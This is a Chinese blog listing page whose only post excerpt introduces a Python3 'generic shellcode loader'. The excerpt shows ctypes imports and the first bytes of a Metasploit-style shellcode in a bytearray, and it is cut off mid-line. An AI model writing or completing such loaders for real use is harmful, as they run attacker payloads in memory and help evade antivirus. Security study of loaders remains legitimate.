会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Michael
长路漫漫,安全作伴。
博客园
首页
新随笔
联系
订阅
管理
2020年11月25日
shellcode加载器编写
摘要: Python3 shellcode通用加载器 #!/usr/bin/python3 import ctypes #shellcode 放这个位置 c = b"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" shellcode = bytearray(c) ptr
阅读全文
posted @ 2020-11-25 09:57 Saint_Michael
阅读(1408)
评论(0)
推荐(0)
公告